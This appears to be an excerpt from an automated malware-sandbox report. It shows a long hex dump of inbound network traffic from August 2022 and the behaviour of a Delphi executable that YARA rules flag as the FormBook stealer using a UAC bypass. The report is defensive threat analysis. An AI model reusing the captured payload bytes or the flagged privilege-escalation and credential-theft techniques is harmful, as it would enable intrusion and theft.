8e c9 66 5e 8c 81 2e dc ca 05 bb d1 5e 92 81 9d 4b 4d 01 cf 60 56 07 0e 2a 4b cc ff c3 b9 58 e6 1a 35 ae 62 52 c1 87 c5 da 54 9d b8 28 64 9d 89 16 0f 88 50 cb c9 c1 79 a6 26 Data Ascii: QUR%vG^cEJ[Ebi\YIw^yV \Q}KA$=X`W %U )X`,2loAA5bQ;cbP=U=fZUSR;`XfIyE;E9;AyIAbOf^.^KM`V*KX5bRT(dPy&
2022-08-08 12:00:14 UTC	112	IN	Data Raw: 7d b4 58 15 c3 5c 50 b8 ad 46 e6 a4 7c 98 50 fc 2b 22 e0 62 bb 22 1b 68 29 58 c3 d7 7e 2c 32 5e 50 83 da db 2f 48 bb c3 ed 45 30 c4 c3 17 a8 c2 42 c3 c5 d7 c9 b3 99 6b a0 4a ea 21 20 d6 d1 5e 87 3d f7 25 d7 c9 c9 68 b1 b3 66 5a 89 fd 7e b0 48 c9 64 e9 e2 40 2f c3 50 66 2b 36 a7 2b 66 bb 85 fb 7a 4a 48 cd 78 3c 51 b0 60 c7 5a be 99 b7 58 5c 52 37 2e 59 c5 c5 93 5b f1 b0 62 0d cd 56 c7 7e d8 2e 57 0b 0c ff ed b5 15 fd 0b 21 22 51 c9 cf 1e d0 80 c6 b8 25 54 66 81 3e df 2f c7 07 9d 35 8c 5c c8 5e 0e cc bf 34 c9 60 83 ad e3 33 5c d3 4a b2 36 b7 12 a4 62 6b 4a 97 d8 5e 50 12 89 db 74 27 41 c7 7b 47 2f ca b9 da 20 5e 59 68 45 5a 4c 77 f5 41 66 9e 51 5a dc c7 f1 1e cf ce da 3d f8 80 e2 cd d3 65 7e 57 48 fb 26 8d b8 39 45 e8 15 d8 47 e4 8c 06 d4 ce 5c e2 6e 25 9b Data Ascii: }X\PF\|P+"b"h)X~,2^P/HE0BkJ! ^=%hfZ~Hd@/Pf+6+fzJHx<Q`ZX\R7.Y[bV~.W!"Q%Tf>/5\^4`3\J6bkJ^Pt'A{G/ ^YhEZLwAfQZ=e~WH&9EG\n%
2022-08-08 12:00:14 UTC	116	IN	Data Raw: c7 3b 9f 1b cc 3d 54 66 91 6b df ba 1b 14 8e ef b7 f9 a6 5c 8c 81 d8 cc 95 4d c9 d7 a1 e5 f5 2f a8 25 dc 4f 2c c9 52 e8 01 ad 32 5e 50 19 cd 98 64 27 af 31 fb af d7 c9 84 bc 80 be 56 52 54 d5 2e a1 2d 41 45 a5 50 c1 22 64 e9 5e 5c c9 88 56 d7 c9 cf 4f 7f 19 66 0f 56 56 d7 bf 46 9f 67 07 cd c7 70 d3 d9 ba d1 9c e0 c6 a1 bb 5e 24 a8 e3 b9 49 dc 95 2b 52 a4 45 4f 32 c8 05 c9 cd 0a f6 e1 4a 54 54 bd d3 e6 7d 31 58 09 56 52 52 60 e6 a1 5e c1 5a cf 0b a8 c0 bb d1 5c 60 bd dc d3 a3 c6 13 a4 f0 49 bf fd f1 8f 1c 32 14 8e ef b7 f9 a6 92 4a 7d da d1 c9 1e 24 7e b2 33 5c d3 4c 9e 36 b5 d3 37 c3 33 aa 5a 64 cf 0f 2e 28 0e 8a 76 af 11 a4 9a cf 95 ce 62 58 22 d9 db ac c4 58 d7 c9 a6 e6 a7 48 1f cd b6 60 cf cd 96 30 42 8b 8e 80 a5 a2 15 96 b2 7b ca 66 c3 36 81 78 1b 2f Data Ascii: ;=Tfk\M/%O,R2^Pd'1VRT.-AEP"d^\VOfVVFgp^$I+REO2JTT}1XVRR`^Z\`I2J}$~3\L673Zd.(vbX"XH`0B{f6x/
2022-08-08 12:00:14 UTC	120	IN	Data Raw: c8 2c 60 50 d4 9b bb d1 e5 f0 f1 cf c7 66 62 5e d1 c3 64 49 93 c7 c0 66 f9 48 c9 d5 66 e2 0e 62 ff c1 f9 60 58 d5 80 49 12 5e a4 62 fb 48 58 c5 f7 e6 7b d1 9a cb fb cf c1 5c ed cc 95 aa bb 54 50 12 d8 2e 52 d3 5c 60 c8 c8 54 66 cd 66 51 ca 58 d3 c5 c5 53 d0 60 cf c9 c1 e0 cc d7 c9 5a 4c 39 3f 26 f8 c7 aa 66 23 48 c9 d5 76 e2 0e 62 94 c1 09 60 58 d5 70 49 12 5e 07 62 fd 48 58 c5 e7 e6 7b d1 96 cb 98 cf c1 5c dd cc 95 b9 11 c5 57 bb 66 5c f7 4d 91 5c bd c3 c2 66 58 d3 26 ce 20 43 0c cc 5c bb df 6c 84 c0 cf c7 21 30 91 53 b4 c5 d7 cb a4 40 a1 b0 bb 58 3d b5 cd c7 d9 78 d9 d7 d1 c9 8a c9 d7 4a 09 e2 8b bb a6 c9 07 5a 58 c3 8a 39 22 d5 8c 50 a0 5c 52 cd a6 45 0c c5 a0 d7 c0 52 d3 c9 ff c8 0a a8 66 58 d7 fd 3e 2e 62 50 78 ba e3 bc 5e 5c ae c4 a9 a1 ba 5e d1 50 Data Ascii: ,`Pfb^dIfHfb`XI^bHX{\TP.R\`TffQXS`ZL9?&f#Hvb`XpI^bHX{\Wf\M\fX& C\l!0S@X=xJZX9"P\RERfX>.bPx^\^P
2022-08-08 12:00:14 UTC	124	IN	Data Raw: 5c 3b 4d 91 31 56 52 50 b1 36 a1 bc fa 9c 89 f2 1d 74 94 91 51 5c c9 27 97 d8 53 1f 1c 3b 54 66 7f 20 df be 2d 8c 58 60 6c e2 df 2b 52 c1 1f 7d 92 8d 8e e9 3e ff 8d 00 0b c1 17 5e e4 c9 52 b4 42 12 30 66 06 2c 35 aa 5c b9 56 8e d1 39 c3 2c 1d 8f 8e 1c 65 0e 13 d7 c9 66 cd 89 60 0d c0 99 19 94 60 56 51 d9 5e aa b2 c6 2a ae f9 14 49 b6 7b ca 66 c3 6f 7b 78 21 2d 87 4f b0 c1 a2 d1 9c 82 9e 1b 69 05 cd 62 be 85 51 b5 d3 45 b7 c5 b3 35 7b 74 31 10 57 b3 91 0f e5 40 15 0a 75 fd a2 8f 8e f3 42 13 c5 d7 c9 d5 16 15 88 8f a6 6e 99 0b 05 ff 22 2c 5e 56 d7 45 4d 21 56 54 5a 5a c3 71 55 cd 5b 60 1c 3f cd c7 7c 7c d9 2f b8 b2 9e 18 49 33 22 e0 d3 4a bd e5 68 33 ba b2 91 3b c6 d5 5e 52 d0 9d 44 be b9 4a c7 25 d2 30 c4 c3 62 5a 28 b7 44 27 1b d0 a1 b2 4d 2c fa ff cf 53 Data Ascii: \;M1VRP6tQ\'S;Tf -X`l+R}>^RB0f,5\V9,ef``VQ^*I{fo{x!-OibQE5{t1W@uBn",^VEM!VTZZqU[`?\|\|/I3"Jh3;^RDJ%0bZ(D'M,S
2022-08-08 12:00:14 UTC	128	IN	Data Raw: 7b ec 10 cf d2 b6 33 39 9f 20 c0 f6 22 31 22 e6 09 c3 72 cd 21 e6 e5 02 31 2c 81 ea 9b 77 71 5f 2b 45 95 82 98 69 e0 7a d6 85 3b a3 4c de e1 2d 11 70 53 12 01 02 a0 80 cb 1a f3 dd 8b 93 80 98 68 49 a1 3b 62 a7 6f 62 12 de 2d ea 34 0d da 4e 2f 80 c6 e4 26 36 ba 1d c6 79 d3 e6 29 91 5d ea dd 8f 3b df b9 ab 56 d6 9e a8 61 ff 50 5f e5 44 d7 50 c6 fa b0 02 0c 5c 63 89 e9 e4 0f e7 08 54 c9 2f b6 da 0b d6 4d 5b b8 b5 c1 0d 1f 85 b0 6e ed 31 a3 5e 11 be f5 1a a0 7f 6c ad 68 4d cc 6e f4 c1 8e e4 e7 60 a3 5d 2e 60 1d bb 6b 5c 2d 13 79 ad 3f 16 56 19 30 bf e8 4b 58 2f ec 1c 88 f3 2c 8e 17 66 58 cf d3 56 54 d0 32 39 0e cb 90 d2 58 d3 c4 70 df b0 ff 35 bf dc 29 1c 55 66 bb c5 c9 7a 23 48 58 e3 c6 f1 c3 60 50 d3 da 55 09 c0 35 83 fe b9 4a 57 f7 0c 30 2b 52 d3 cf 54 40 Data Ascii: {39 "1"r!1,wq_+Eiz;L-pShI;bob-4N/&6y)];VaP_DP\cT/M[n1^lhMn`].`k\-y?V0KX/,fXVT29Xp5)Ufz#HX`PU5JW0+RT@
2022-08-08 12:00:14 UTC	132	IN	Data Raw: e0 44 3e e8 05 cb 5a 4c 7d 6e 5a 64 5a fb e6 e6 9a be 48 bb c1 00 ad 30 ba c3 62 5a 62 9c 83 67 2f 24 90 f1 44 88 62 50 c1 cf 93 cb a0 5c c9 cf 4c 4a 1e e2 58 88 b1 2f 5a c7 4a de d7 ca 4c a5 ac b9 0e ea 8d 0c 01 7e 2c 94 f9 96 c3 22 e0 d3 4a 24 bf 68 c2 c4 52 d1 4c f2 9b 9b c0 17 d1 27 ea d4 d2 3d 3d d2 5e 20 bd 0d cd 06 23 7f c8 23 d8 a3 5e c1 4c b1 68 a8 be bf 55 9b 5c c9 4a 22 7e 31 bc 58 da b1 66 5a 68 4b 7e aa b4 c4 64 ac 28 2f 1e 3f c1 d7 7e e4 78 31 c4 a8 c2 31 be bf 3d 2c 33 a4 24 e8 5e 16 e6 64 cf c7 ee e2 46 ba 07 56 cd c8 c5 98 64 cb 4f 62 13 0a 59 31 8b e4 c2 d2 44 c9 62 df 02 84 b2 c2 33 cd 58 cb 7b 99 9f cb cc b3 e6 09 97 5d 56 d7 54 fe 57 4b b2 91 ca d3 c3 cb f7 e9 c0 c2 60 e2 3c 2d c0 60 8e 35 45 b5 b2 2c 4a da c7 5a 62 59 b7 2c d5 4d 99 Data Ascii: D>ZL}nZdZH0bZbg/$DbP\LJX/ZJL~,"J$hRL'==^ ##^LhU\J"~1XfZhK~d(/?~x11=,3$^dFVdObY1Db3X{]VTWK`<-`5E,JZbY,M
2022-08-08 12:00:14 UTC	136	IN	Data Raw: b6 de 44 92 9e 7c 4f c9 04 ea 22 e0 b2 0d 3c 58 c1 c3 e8 6a 33 1f 5a 64 5a 44 2e 2a b0 34 55 ad 54 54 d3 07 f1 ae 2a c6 9b 56 52 5c 9f f1 c4 36 45 2e 31 c1 50 58 af de 99 35 58 5e dd bc 80 c1 cd 1b 64 a3 32 19 40 66 50 c2 01 78 b0 5c 56 66 46 46 30 d1 5a ae da 7e a8 62 91 4f 4a 48 cd 44 47 55 b5 d1 c5 b0 57 86 1d c0 5c 52 58 ad b5 42 b6 56 8b e4 c3 d1 23 a0 df aa 54 66 cf 2a 02 8d 2e 52 8e 81 e0 e4 60 cf 5a 36 73 3b dc ac a0 06 53 c4 09 1a 3b ea 1a ce 48 c9 66 3e e2 3d d3 c3 c5 80 e9 31 c2 c9 d7 bf 2a 2a a5 b2 b0 58 c1 f5 fc 6a 29 25 5a 64 58 3c e6 2a 50 09 c1 fc 40 c5 b9 ae 98 db d3 c9 58 b3 44 ce 8e c4 d7 cf c5 9f 9d b7 23 5c bb d3 60 07 22 6d c7 d5 21 e4 78 56 c5 d7 5c ab c8 18 b0 b0 c9 d1 54 32 c8 a5 5c 63 d7 d1 5a cd 03 be b2 c2 cd 62 56 96 bd 43 bf Data Ascii: D\|O"<Xj3ZdZD.4UTTVR\6E.1PX5X^d2@fPx\VfFF0Z~bOJHDGUW\RXBV#Tf.R`Z6s;S;Hf>=1Xj)%ZdX<P@XD#\`"m!xV\T2\cZbVC
2022-08-08 12:00:14 UTC	140	IN	Data Raw: 02 ec a0 d0 fe bf 85 55 60 52 cd ee 79 c3 50 bd a6 f1 29 4a 61 08 04 8a 3d 3e 9e e8 c3 2f f8 15 49 56 f6 8a 99 c2 5f 1e 59 e9 ea 4a c5 c5 4b 0c 39 02 05 47 99 59 cb c8 90 e8 d5 5e c1 c9 d1 81 41 b8 ea cc 20 c4 8e d0 42 5e a6 2a 29 aa 60 a3 c4 70 4d c4 24 a3 91 2d 51 0e b1 37 7f 17 78 34 fd 01 88 66 bb 5e cd 05 55 10 19 de e0 d5 8a da 27 e0 b9 d2 bd 19 43 46 a8 57 41 87 48 be 39 2c bb cc 53 8f 4a bb 4b 32 b9 cb 62 f9 2c 84 bd b0 99 c3 67 9b cd 58 5e 6b 32 19 bc d1 3b 50 f0 51 cf f9 4d c7 27 53 62 79 1e cf ce b7 cd 3b da 93 fd 8b 68 59 12 2a cd 12 d4 58 c1 cd 95 85 b5 bb 70 77 52 8e 64 62 7d 8f f3 e8 ed 40 62 09 e2 cb e6 9d 58 43 c8 c7 8d 1a 62 88 ca 1a a7 0a 9c 8f f5 cf 12 9b c5 f9 cc 4a d4 62 cf 16 87 4e d6 cc 56 d7 c5 79 8f 0c bf bf 65 c1 f0 5c 32 b9 37 Data Ascii: U`RyP)Ja=>/IV_YJK9GY^A B^)`pM$-Q7x4f^U'CFWAH9,SJK2b,gX^k2;PQM'Sby;hYXpwRdb}@bXCbJbNVye\27
2022-08-08 12:00:14 UTC	144	IN	Data Raw: 36 55 05 ba 5e 56 d1 1c e0 a7 1b 50 b8 9d 25 0c 04 bb 85 55 60 52 00 55 7a 52 c1 cd 35 a7 4b 31 35 4a cf 5a 26 d4 3e d9 f2 d7 c0 b7 c4 f9 8b da 5e 50 d3 29 3d 57 00 16 c8 c5 4a ac f0 db c0 b8 4b 40 b0 81 3b 2e 5e a0 44 c9 d1 53 e9 84 b6 5a 0b 18 37 28 c7 d5 06 62 78 56 10 ca 24 c7 c7 66 67 bd d4 89 b0 cd 92 95 d6 46 41 a4 c9 d3 06 33 e3 cf 5c d5 7f d6 e2 09 29 58 c3 66 10 2c 32 2d 50 c9 5e c5 07 79 e8 ac c5 4a d5 d4 d7 51 4c 99 19 ac 41 82 24 07 20 73 89 37 78 58 ac 87 dc 66 43 e2 cf 54 d5 7b f7 ac 49 3f 2f 5a 54 4a 5c db 48 c9 d1 c3 d3 0e 62 52 c1 5e d1 c9 55 7c d8 12 37 cd d1 65 19 f1 19 cb cb ed e8 0d 26 94 1e f2 d5 13 4a 5c b9 3f e1 83 47 c7 2c 52 d3 84 47 df aa 41 1c a8 57 0f dc 4c db 45 c2 ce 16 07 f1 99 fd 8e 17 76 c9 cf 15 b2 08 4b 5a c7 f1 fe db Data Ascii: 6U^VP%U`RUzR5K15JZ&>^P)=WJK@;.^DSZ7(bxV$fgFA3\)Xf,2-P^yJQLA$ s7xXfCT{I?/ZTJ\HbR^U\|7e&J\?G,RGAWLEvKZ
2022-08-08 12:00:14 UTC	148	IN	Data Raw: 73 32 31 26 fc cf 6b 2b 48 d5 51 37 55 9b 48 2c 31 f3 8b 8e 80 a5 a2 14 04 fb 17 0a 90 6c 3c 8c 01 a2 c5 4b a7 c3 50 66 be 4b 21 95 fc d7 d2 e6 43 d7 55 2c 48 97 e4 c3 60 64 f4 ed 2d 1d f5 33 44 64 55 af 18 fb 0a d8 d1 7f 4f c9 cd 64 89 dd 35 f5 e2 99 b2 58 d3 c7 06 53 3c a8 11 cd 58 58 3b 99 00 cb be b3 77 98 1a c8 cf ca c8 35 24 4d c3 5c cf b3 6a 23 2f b8 ba d1 c9 d1 fc 51 2a 2f e7 27 2e 48 4f 2c f8 0f c7 5a 62 e2 b7 71 c9 47 99 c1 16 c8 54 bb 54 74 db 31 84 d0 40 ae 54 66 5e 61 a1 46 9a 0d 10 ce 64 87 dc cf cd 48 e5 df 62 c6 e4 c2 25 68 ca 9d bf 43 a3 9f 3e 37 a5 7a 62 d2 0c 33 cd 3b 34 c9 60 58 44 d4 1f cd 4a 6d d4 99 c4 5d 2c c2 0f b3 cb d5 5e 8d 55 ac 76 53 b9 4a c5 c5 66 3b 20 76 0f c5 06 d8 eb 59 ca 51 c9 11 81 55 bd f9 f7 06 4b 27 11 74 ae d2 ec Data Ascii: s21&k+HQ7UH,1l<KPfK!CU,H`d-3DdUOd5XS<XX;w5$M\j#/Q*/'.HO,ZbqGTTt1@Tf^aFdHb%hC>7zb3;4`XDJm],^UvSJf; vYQUK't
2022-08-08 12:00:14 UTC	152	IN	Data Raw: 22 b9 d2 41 07 1d dc 49 ac d8 42 bd 40 1a ff 07 1e 63 c9 62 50 c1 62 12 01 b2 20 e4 cf 54 43 ec f7 b8 1b 1d c4 ae 43 40 66 c3 39 58 fb 2b 28 04 98 12 ce 1a 07 88 20 fa 96 a3 a0 8d 4d c5 d2 f0 0c e6 c9 c1 2f f5 f3 21 d2 3b c9 cd c3 5c c7 83 1d c5 ff c4 c9 c3 b2 58 07 c7 50 c5 d7 66 5a 0b 35 45 a7 50 52 39 79 e9 c6 2f c0 c2 33 b8 9f cf 60 d6 54 fd d3 42 55 98 83 b9 58 5c e6 21 7b 4f 52 52 6b 80 f1 b8 d7 13 19 2d cd 17 2d 3c 1d dc 2e 58 b7 94 f9 8b da 60 3b 25 91 ce 5c 4a 23 6f dd 4a 64 c9 c3 b6 d4 95 c7 c3 c5 d7 d7 8f c6 c1 9c 62 c3 c1 5c a0 d1 5e ac c9 94 bb 13 60 59 a5 ae 79 90 fb 87 65 c9 fd d7 57 b4 8c 28 ae 56 b7 1f e3 1c ff ef 9d 92 7b fc 8c 92 eb 48 d1 dc 2e d1 ac da 54 23 ba 99 4c 88 67 c3 cf 3e 5f dd 29 d8 dc c9 50 31 1b 84 33 7f c8 d7 5a be f6 d9 Data Ascii: "AIB@cbPb TCC@f9X+( M/!;\XPfZ5EPR9y/3`TBUX\!{ORRk--<.X`;%\J#oJdb\^`YyeW(V{H.T#Lg>_)P13Z
2022-08-08 12:00:14 UTC	156	IN	Data Raw: 26 e9 1f b8 21 d2 b7 c9 cd bf cf a2 27 99 1b ad 35 dd 47 a5 60 a2 42 c3 56 8e 97 7e cf 50 5e 01 af ca 05 93 07 55 10 ff e4 93 90 53 7f 96 3d 2c 90 51 c7 c7 66 2b a5 d4 89 86 49 cc 72 a4 ca c4 2d db 02 c9 d7 4c 03 e2 a5 bb b9 5a 56 90 c0 e7 73 aa d3 cc 9b c4 45 28 c3 5c bb 2a d1 d6 5e 32 37 6f 05 98 08 a7 b5 56 41 67 b8 90 83 24 94 4c 7d 51 4a 60 50 4f f1 2d 4c 09 58 cf 60 6b 48 0e 57 35 88 26 cc b9 58 c9 76 de 42 5a d6 44 c3 34 37 8d 8e e9 3e 8e f9 03 bb b9 ac 03 8d e2 82 60 ae 37 2d c6 a8 31 35 1b c4 b4 1e 1b 42 a8 c7 4d 44 ba b4 13 0e 59 25 8b e4 66 5e 56 c1 7a 50 c1 5c e6 85 d2 95 b9 59 cc 35 b8 d0 a7 1b 50 ca 51 cf 4b 4d cf 55 53 b8 aa 8d 65 85 c1 71 12 8a c9 60 1d 1a b5 9b cd d1 13 b5 f1 b2 33 79 d6 36 57 9e 29 11 10 e6 1d 7f 51 b9 4a cf 6b 72 be 35 Data Ascii: &!'5G`BV~P^US=,Qf+Ir-LZVsE(\*^27oVAg$L}QJ`PO-LX`kHW5&XvBZD47>`7-15BMDY%f^VzP\Y5PQKMUSeq`3y6W)QJkr5
2022-08-08 12:00:14 UTC	160	IN	Data Raw: 58 66 48 2b 51 23 4a d6 19 06 2e c9 52 62 69 57 b4 eb 3f 31 19 15 99 25 4a c5 c7 7a c3 da d7 a7 c6 89 95 ca 6b df 75 07 d6 0c ff ed b5 a0 45 87 dc 5e cf ff 7f df 66 58 cf 3d c7 c5 60 52 c8 0e 66 c3 b9 58 d1 c3 5c e2 4d 7b a8 d7 a4 c4 d1 c9 d1 d3 a1 2a c0 4a 48 5c 58 2c 2e 52 a4 56 9e d5 0b 50 9c cd 96 5c 8c 19 54 54 4c bf e6 44 d3 c9 cd de cc ce 66 58 d7 43 ce e2 d3 c1 50 3d d4 da 33 cd 58 5e e2 99 9f bc 20 f4 54 d5 a2 5f df c4 c3 8c c9 d1 54 c9 40 a5 53 94 d7 62 5f 7b 80 35 c7 22 e0 d3 4a 4c c1 dc 57 2e 52 62 8c 20 ed 33 c1 58 58 cb a3 3e a8 e0 79 47 1f 4d 46 62 cb e8 d2 db b6 66 58 d3 56 ce 2e 2f 38 1f 9b bb a4 5e cf 5d 8e df c4 c9 5e d5 5e b3 a1 29 c7 92 aa 4f 3c 58 d3 06 9e df d3 c3 50 88 de e2 d1 c9 d7 98 51 e6 62 bb b9 ea c1 5a 58 15 de 7f cb 35 5e Data Ascii: XfH+Q#J.RbiW?1%JzkuE^fX=`RfX\M{*JH\X,.RVP\TTLDfXCP=3X^ T_T@Sb_{5"JLW.Rb 3XX>yGMFbfXV./8^]^^)O<XPQbZX5^
2022-08-08 12:00:14 UTC	164	IN	Data Raw: 9d 94 12 6f a6 92 7f 17 78 34 fd 60 58 66 48 16 8c 92 ac f1 34 5d f4 11 61 f6 56 80 b2 9b d5 c7 ef 50 42 ab 68 f2 0a ae e6 88 e6 f2 90 d3 2a 63 14 7e cd c2 8e 90 54 a0 1e 86 44 e3 b5 f2 5f 8a 36 8d 2c fd 16 02 e5 60 37 ba 17 d6 f9 b9 25 d4 62 e1 bf cb dd 9d 53 44 f3 06 ef 9f 0a 40 c3 40 67 d7 71 78 6b f7 f0 59 7c b4 9f 4e f1 87 92 f9 e2 0e f7 0c 57 25 9b d5 4c ce 81 07 bc 25 36 bf b9 c6 58 1a 41 6a be 9f 1c fa 14 60 94 5c b5 d5 c1 13 4d 9a c3 c2 b1 97 5f 95 20 b6 b9 ae 6f e4 c8 91 65 55 d8 4c a8 90 3b 5b 05 76 e6 e4 96 16 54 18 32 52 32 3d be b6 f3 12 f0 4b ed ae cd 91 c6 53 de 8a b5 57 28 14 f0 0c 84 ba ae 17 fa 93 a8 9b a5 b1 76 4e 77 ea 52 02 de 51 e6 a3 0a 59 eb 2f 7a 68 9c e2 19 a6 cc b0 59 86 e9 59 db b0 cc b1 0a 0b 09 b8 13 77 7a 48 24 16 07 8e 77 Data Ascii: ox4`XfH4]aVPBh*c~TD_6,`7%bSD@@gqxkY\|NW%L%6XAj`\M_ oeUL;[vT2R2=KSW(vNwRQY/zhYYwzH$w
2022-08-08 12:00:14 UTC	168	IN	Data Raw: 9d cf 60 56 c5 ef 49 bf 56 95 c7 6f 9d 4c 04 e6 2f 98 f0 bd 9f f6 6b 60 58 66 4a f3 de aa 4e 0a bd a6 2e 5c f0 c9 7b 18 c9 36 17 2c cd c3 5c 48 e7 d6 c1 9c 32 5c 61 b2 dd 8f bb ab a2 32 c9 66 5e 50 84 51 48 80 8f c3 64 8d 60 81 e8 42 66 58 cf d1 df 47 b6 cb 14 cf f0 c8 35 9a 02 62 fb 42 5e 3a 8e 75 d1 c9 60 c9 eb c8 b6 58 91 bf 0f 2c cd 69 d1 7f 22 4a a3 92 9b 50 c9 cd 52 f1 ca 5a 13 40 d7 75 d1 86 91 a8 6a 14 bf 95 98 2c 66 5e c1 58 7c 43 b9 5a 08 21 bc fe 50 2a bb 16 37 6d 60 56 54 d7 84 d4 bb 2e a4 3c 58 60 52 5c 6a 51 ba c7 24 21 5c 93 48 98 3e 70 6f 5a 85 0a d5 20 a4 2c 52 d1 56 5a eb 4d c9 2c e3 61 64 ef 79 35 7f 79 cb 99 ac a7 58 5c c7 52 e7 e4 d1 4c 8d bd 79 0d b5 c1 5c bb 60 80 4f 19 c9 14 b2 a2 6d dd b3 48 36 5d 65 c7 66 c3 48 7a 53 ba c7 14 66 Data Ascii: `VIVoL/k`XfJN.\{6,\H2\a2f^PQHd`BfXG5bB^:u`X,i"JPRZ@uj,f^X\|CZ!P*7m`VT.<X`R\jQ$!\H>poZ ,RVZM,ady5yX\RLy\`OmH6]efHzSf
2022-08-08 12:00:14 UTC	172	IN	Data Raw: c7 8e 50 cd d3 35 51 95 66 55 74 75 c9 5e 48 be 3b 8f 38 5a 19 46 52 48 50 ac 3d 24 ea 75 ae 36 66 60 c1 b0 57 8f 87 40 cb d8 4a 48 c1 c4 e4 20 f1 fc 0b ba 64 cf 58 d1 e2 0a 62 56 0c 7a 54 bb bf d5 cc 8b 96 76 cb 84 54 66 c1 66 51 08 de 88 72 32 cd 4a 48 5a 53 20 52 4e 54 48 5e d1 cf 5c 49 93 2e fd 0a b1 48 c9 b9 5e e2 0e d8 f3 25 5d 60 58 b9 48 49 12 b9 23 e0 9c 48 58 c9 bf e6 7b d3 bb 9e 7f cf c1 50 f5 cc 95 6b 7b 2a 97 bb 66 50 df 4d 91 6d fe ca d7 66 58 bf 7e ce 20 df ee b9 b3 4a 60 c7 78 e6 26 39 89 ec a5 d1 c7 cd 6e 55 0e 61 79 81 54 c9 d1 cb e1 c8 8b 20 64 ee 58 58 d1 c1 76 d4 97 94 bc 1e 02 58 c1 52 dd 3d 18 db ba 34 c6 c1 58 54 7b 53 10 07 4f c7 68 66 58 5a 1e 57 95 22 ff 78 65 58 d7 c7 81 e6 8b 1d 75 54 22 60 cf c5 8d e0 0e 2a 7e 98 49 c7 c5 bf Data Ascii: P5QfUtu^H;8ZFRHP=$u6f`W@JH dXbVzTvTffQr2JHZS RNTH^\I.H^%]`XHI#HX{Pk{fPMmfX~ J`x&9nUayT dXXvXR=4XT{SOhfXZW"xeXuT"`~I
2022-08-08 12:00:14 UTC	176	IN	Data Raw: e6 e0 b4 6c 10 7d 32 c8 24 1b b9 e9 91 83 c4 64 db 22 cb c2 87 ae 85 23 60 ef 93 5c d0 08 1b 5c 19 08 c2 d1 d4 0e 33 1b 67 73 c6 44 d3 3d 2c 64 31 06 c3 c6 28 4a cc 59 d5 d6 2e 64 f2 58 b3 cb d5 5d 26 f1 c0 21 2f cd e6 42 19 52 29 2c 37 e6 9d 5c 4f 44 48 52 21 ca 55 c5 4d 49 c4 8c 9b 81 5b e3 99 c9 cf c7 a3 e4 ae 20 39 5c b8 51 cb f9 4d bf e1 8b b4 1f 28 bf 0f b7 d1 09 da d5 0d 9d 52 05 55 fe a7 b2 b9 c9 50 82 55 33 91 39 50 30 c6 b8 ff 28 1f 61 cd 47 35 41 af 1b 45 46 56 9d c2 09 28 21 45 54 8b 88 6e 2c 96 11 35 c4 d0 cd 22 51 d1 49 cc 5a d6 e4 4c a8 b1 1f 51 d7 43 a3 d7 55 9d 78 ac 28 56 d3 54 2e ef e9 17 a7 c0 5e 3f 9b 19 e4 5b c1 31 f0 c7 4d b7 c1 a8 2e c9 d8 f0 bd 49 46 25 59 72 1b 40 be 8b e4 c3 d1 81 a9 df 21 c5 a2 ba b2 11 d9 be 57 b7 0c f6 bb d1 Data Ascii: l}2$d"#`\\3gsD=,d1(JY.dX]&!/BR),7\ODHR!UMI[ 9\QM(RUPU39P0(aG5AEFV(!ETn,5"QIZLQCUx(VT.^?[1M.IF%Yr@!W
2022-08-08 12:00:14 UTC	180	IN	Data Raw: c9 cd c3 5c b9 4a c5 c5 4a d7 c9 c3 62 58 5c c7 c3 c5 d7 c9 66 5e c1 c9 62 50 c1 5c bb d1 5e 5c c9 cf c7 66 58 cf 60 56 54 66 5a c7 c7 66 c3 b9 58 60 52 cd c7 62 52 c1 d7 d1 c9 60 58 66 bb 5e cd 62 bb b9 c9 50 cb c9 52 d1 56 cb d5 5e 50 c9 cd c3 5c b9 4a c5 c5 4a d7 c9 c3 62 58 5c c7 c3 c5 d7 c9 66 5e c1 c9 62 50 c1 5c bb d1 5e 5c c9 cf c7 66 58 cf 60 56 54 66 5a c7 c7 66 c3 b9 58 60 52 cd c7 62 52 c1 d7 d1 c9 60 58 66 bb 5e cd 62 bb b9 c9 50 cb c9 52 d1 56 cb d5 5e 50 c9 cd c3 5c b9 4a c5 c5 4a d7 c9 c3 62 58 5c c7 c3 c5 d7 c9 66 5e c1 c9 62 50 c1 5c bb d1 5e 5c c9 cf c7 66 58 cf 60 56 54 66 5a c7 c7 66 c3 b9 58 60 52 cd c7 62 52 c1 d7 d1 c9 60 58 66 bb 5e cd 62 bb b9 c9 50 cb c9 52 d1 56 cb d5 5e 50 c9 cd c3 5c b9 4a c5 c5 4a d7 c9 c3 62 58 5c c7 c3 c5 Data Ascii: \JJbX\f^bP\^\fX`VTfZfX`RbR`Xf^bPRV^P\JJbX\f^bP\^\fX`VTfZfX`RbR`Xf^bPRV^P\JJbX\f^bP\^\fX`VTfZfX`RbR`Xf^bPRV^P\JJbX\

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 1a#U00bb.exePID: 6128, Parent PID: 4548

General

Target ID:	0
Start time:	14:00:11
Start date:	08/08/2022
Path:	C:\Users\user\Desktop\1a#U00bb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1a#U00bb.exe"
Imagebase:	0x400000
File size:	732672 bytes
MD5 hash:	251EF95E26D436E7BFE64636978DCC4B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.303458989.0000000002268000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.303584675.00000000025FD000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 